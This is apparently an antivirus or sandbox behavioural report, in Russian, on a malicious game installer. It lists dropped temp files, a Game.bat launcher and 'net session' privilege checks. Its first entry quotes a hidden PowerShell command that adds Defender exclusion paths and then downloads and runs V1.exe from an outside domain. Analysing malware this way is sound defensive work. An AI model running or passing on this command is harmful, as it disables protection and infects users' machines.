Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V...
- <Текущая директория>\game.bat
- <Текущая директория>\setup.exe
- %TEMP%\is-kirtu.tmp\setup.tmp
- nul
- %TEMP%\is-2rdr7.tmp\_isetup\_setup64.tmp
- %TEMP%\is-2rdr7.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-2rdr7.tmp\idp.dll
- %TEMP%\is-2rdr7.tmp\innocallback.dll
- %TEMP%\is-2rdr7.tmp\isdone.dll
- ClassName: 'EDIT' WindowName: ''
- '<Текущая директория>\setup.exe'
- '%TEMP%\is-kirtu.tmp\setup.tmp' /SL5="$E0022,3455186,140800,<Текущая директория>\setup.exe"
- '%WINDIR%\syswow64\cmd.exe' /c ""<Текущая директория>\Game.bat" "
- '%WINDIR%\syswow64\net.exe' session
- '%WINDIR%\syswow64\net1.exe' session